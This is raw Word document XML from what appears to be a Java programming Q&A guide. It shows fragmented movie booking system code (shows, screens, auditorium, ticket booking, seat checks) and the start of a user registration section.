        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F6648"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ovieSh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ovieShows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E3918D"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4F53AD4E"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cree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creen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ovieSh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ovieShow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82C766E"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screen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creenName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC845C9"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movieShow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ovieShows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A29F21B"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639D797"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54109744"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displayAllShow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B87FC9F"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creen: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creenName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF32F56"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MovieShow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> show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ovieShow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E6BCC55"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sh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isplaySeats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388ACDC5"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004BFD4"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14009E0"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60C79264"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bookTicke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movie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atCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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seatInde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347F31F"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MovieShow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> show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ovieShow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A46E292"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h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ovie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qual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ovie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C6EF3F9"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sh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ookTick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eatIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779277BD"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908773C"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4D31016"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Movie not found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D0D49"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45937592"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51249E4"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69A98039"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checkSeatAvailability</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movie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atCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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seatInde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6A90717"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MovieShow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> show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ovieShow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D81C4EA"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h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ovie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qual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ovie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66C0A64"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sh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heckSeatAvailabilit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eatIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D77FCF"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B4F0E1B"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2DCD67B"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Movie not found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1D2120"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018C8698"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7143104"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA917FC"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6E09DFFF"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uditorium</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BE319BC"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auditoriumName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F064F"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cree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creens</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3281C357"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372FB4C0"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uditorium</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auditorium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cree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creen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C3602EA"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auditorium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uditoriumName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1AAAB0"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screen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creens</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D13206B"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1CF73BA"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2E976BA8"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displayAllScreen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209D1A5"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uditorium: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uditoriumName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC509A"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creen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scree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creen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C6CFD7D"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scree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isplayAllShows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C457137"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F15056C"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47DF426"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2F0C2F92"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bookTicke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movie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atCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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seatInde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189BEBF"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creen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scree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creen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C675C89"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cree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ookTick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ovie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eatInde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455C19F"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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1CB8A"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F1A35F6"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B950D7D"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creen not found for the movie."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70333632"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77B3086F"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A57764C"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786211B4"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checkSeatAvailability</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movie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atCategory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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seatInde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54E2D42"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creen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scree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creen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32B3B62"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cree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heckSeatAvailabilit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ovie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eatInde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C91E27D"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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA9E9D"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393EFA2"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D5D0AC6"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creen not found for the movie."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4572F737"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6682D60A"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45A2E66"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2E70E"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3456E26C"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inemaBookingSystem</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4391704"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D349666"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ing Movie Shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A8566"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ovieShow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> movieShow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ovieShow</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Movie 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p>
    <w:p w14:paraId="485C5253"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ovieShow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> movieShow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ovieShow</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Movie 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p>
    <w:p w14:paraId="18CF23CE"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5D9D4DA8"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ing Screens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B90C3B"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creen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> screen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cree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creen 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ovieSh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ovieShow1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34172A59"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creen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> screen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cree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creen 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ovieSh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ovieShow2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C055FF"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28B00449"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ing Auditorium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A126AF"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uditorium</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> auditori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uditorium</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Main Auditori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cree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creen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creen2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5855C9F6"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6E31B9A8"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Display all screens and movie shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AC5354"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auditori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isplayAllScreens</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62056334"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03BBA9BF"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Book a ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516BAE6C"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auditori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ookTicke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Movie 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at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OL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p>
    <w:p w14:paraId="2B0F3B41"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0260F42D"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heck seat availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C84015E"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isAvailabl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uditoriu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heckSeatAvailability</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Movie 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atCateg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ILV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4F3554A2"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eat availability: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sAvailable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFCA165" w14:textId="77777777"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5BD55A8" w14:textId="10B676CB" w:rsidR="00B4136F" w:rsidRPr="00CE4B95"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4AA9C0EE" w14:textId="77777777" w:rsidR="00B4136F" w:rsidRPr="00CE4B95" w:rsidRDefault="00B4136F" w:rsidP="00B4136F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B07060" w14:textId="77777777" w:rsidR="00B4136F" w:rsidRPr="00CE4B95" w:rsidRDefault="00B4136F" w:rsidP="00B4136F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467B84C8" w14:textId="1FE85A09" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="377" w:name="_Toc196307857"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00595B02" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Movie Booking System related code and data structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="377"/>
    </w:p>
    <w:p w14:paraId="0BA1CC1E" w14:textId="27B25059" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920" w:rsidP="00BD73E6">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00BD73E6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Movie booking system related java codes, check availability, book ticket with multiple classes and use of data structures?</w:t>
      </w:r>
      <w:r w:rsidR="00BD73E6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59205E1C" w14:textId="28E86956" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00595B02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Refer above code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD9A1CD" w14:textId="0A654735" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="378" w:name="_Toc196307858"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00BE1951" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain User registration functionality</w:t>
      </w:r>
      <w:bookmarkEnd w:id="378"/>
    </w:p>
    <w:p w14:paraId="11211263" w14:textId="7070AEF2" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920" w:rsidP="00257193">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00057CF1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Explain</w:t>
      </w:r>
      <w:r w:rsidR="00257193" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the implementation of the User registration method using java? Explain how will you implement it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB1C6F" w14:textId="47BA73C4" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00927258" w14:textId="5E06AD9C" w:rsidR="009667C9" w:rsidRPr="00CE4B95" w:rsidRDefault="009667C9" w:rsidP="009667C9">
      <w:pPr>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color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>User Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D0E41" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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Us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028C4AF" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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username</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570E302F" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565B6745" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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email</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B95A700" w14:textId="77777777" w:rsidR="009667C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
